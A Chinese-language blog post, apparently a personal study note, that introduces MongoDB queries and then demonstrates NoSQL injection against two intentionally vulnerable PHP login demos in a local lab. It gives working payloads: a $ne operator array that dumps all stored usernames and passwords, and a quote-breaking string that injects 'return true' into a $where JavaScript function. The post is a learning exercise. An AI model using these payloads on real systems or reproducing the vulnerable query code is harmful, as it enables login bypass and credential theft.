参考链接:
https://blog.csdn.net/LYJ20010728/article/details/120315956
直接用docker拉去mongodb的镜像就能用
docker pull mongo:latest
Mongodb数据库的基本使用
mongodb的查看数据库和表的命令和mysql的相类似
show databases == show dbs show tabes == show collections
mongodb创建数据库直接使用 use 数据库名 如果不存在它会自动给你创建,创建表命令
db.createCollection("表名")
如果想查询表中所有数据:db.表名.find() 相当于mysql中的 select * from 表名;
如果想查询表中指定的内容,则类似于json格式的查询
db.表名.find({"键":"值","键":"值"})
Mongodb数据库Where条件的使用
mongodb数据库中有一些类似于特殊的符号用来作为条件
db.sys.find({"age":{$ne:10}}) //类似于 where age != 10
{ "_id" : ObjectId("652c90b097e2eacd0ca2eded"), "name" : "zhangsan", "age" : "18" }
{ "_id" : ObjectId("652cd4b4bc8262ecb7b950a0"), "name" : "lisi", "age" : "20" }
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
{ "_id" : ObjectId("652cd74dbc8262ecb7b950a2"), "name" : "xiaofu", "age" : 17 }
{ "_id" : ObjectId("652cd776bc8262ecb7b950a3"), "name" : "xiaofu2", "age" : 17 }
{ "_id" : ObjectId("652cd783bc8262ecb7b950a4"), "name" : "liliu", "age" : 30 }
db.sys.find({"age":{$gt:10}}) //类似于 where age > 10
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
{ "_id" : ObjectId("652cd74dbc8262ecb7b950a2"), "name" : "xiaofu", "age" : 17 }
{ "_id" : ObjectId("652cd776bc8262ecb7b950a3"), "name" : "xiaofu2", "age" : 17 }
{ "_id" : ObjectId("652cd783bc8262ecb7b950a4"), "name" : "liliu", "age" : 30 }
db.sys.find({"age":{$gt:20}}) //类似于 where age > 20
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
{ "_id" : ObjectId("652cd783bc8262ecb7b950a4"), "name" : "liliu", "age" : 30 }
Mongodb数据库AND条件的使用
默认在查询时就使用and条件去查询的
or的用法稍稍复杂了点,需要在最开始指定$or : [ {条件1} , {条件2} ]
db.sys.find({$or:[{"name":"zhangsan"},{"age":{$ne:17}}]})
{ "_id" : ObjectId("652c90b097e2eacd0ca2eded"), "name" : "zhangsan", "age" : "18" }
{ "_id" : ObjectId("652cd4b4bc8262ecb7b950a0"), "name" : "lisi", "age" : "20" }
{ "_id" : ObjectId("652cd4efbc8262ecb7b950a1"), "name" : "wangwu", "age" : 30 }
Mongodb数据库注入demo1
这里是使用linux系统的小皮面板进行搭建的,有两个踩坑的小点要注意,一个是在安装好数据库后要将php.ini中的exention mangodb前面的注释符去掉,一个是在小皮防火墙那里要放行27017端口
show_source();
$manager = new MongoDBDriverManager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
$query = new MongoDBDriverQuery(array(
'username' => $username,
'password' => $password
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
foreach ($result as $user) {
$user = ((array)$user);
echo "Login Success".PHP_EOL;
echo 'username:' . $user['username'].PHP_EOL;
echo 'password:' . $user['password'].PHP_EOL;
}
} else {
echo 'Login Failed';
}
传入username[$ne]=0&password[$ne]=0 即可获得表内所有账号密码
关于原理写文章的大佬已经说的非常清楚了,其实就是因为PHP是一门比较松散的语言,当你传入数组一打印就会被解析成类似于json的格式,这里我加上$ne 也就是 !=的条件
我传入的是传入username[$ne]=0&password[$ne]=0 实际在数据库中执行的语句则为
db.users.find({"username":{$ne:0},"password":{$ne:0}})
{ "_id" : ObjectId("652cc700627bdd35ea36d221"), "username" : "admin", "password" : "123" }
{ "_id" : ObjectId("652cc70a627bdd35ea36d222"), "username" : "sys", "password" : "123456" }
{ "_id" : ObjectId("652ce782627bdd35ea36d223"), "username" : "flag", "password" : "flag{xxxx-xxxxx}" }
Mongodb的JavaScript 注入
mongodb是可以去执行javascript代码的,比如下一段小demo
$manager = new MongoDBDriverManager("mongodb://127.0.0.1:27017");
$username = $_POST['username'];
$password = $_POST['password'];
$function = "
function() {
var username = '".$username."';
var password = '".$password."';
if(username == 'admin' && password == 'admin123'){
return true;
}else{
return false;
}
}";
$query = new MongoDBDriverQuery(array(
'$where' => $function
));
$result = $manager->executeQuery('test.users', $query)->toArray();
$count = count($result);
if ($count > 0) {
foreach ($result as $user) {
$user = ((array)$user);
echo "Login Success".PHP_EOL;
echo 'username:' . $user['username'].PHP_EOL;
echo 'password:' . $user['password'].PHP_EOL;
}
} else {
echo 'Login Failed';
}
username=1&password=1';return true// 不去注释掉多余的单引号也行,去用 $comment='123456 也行
这段代码执行后其实就是
function() {
var username = '1';
var password = '1';return true//'';
if(username == 'admin' && password == 'admin123'){
return true;
}else{
return false;
}
在数据库中执行的就是
db.users.find({$where: "function() { var username = '1';var password = '1';return true;var a='1';if(username == 'admin' && password == '123456'){ return true; }else{ return false; }}"})
原文始发于微信公众号(飞奔的狸花猫):记录一次NoSql数据库的注入学习
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论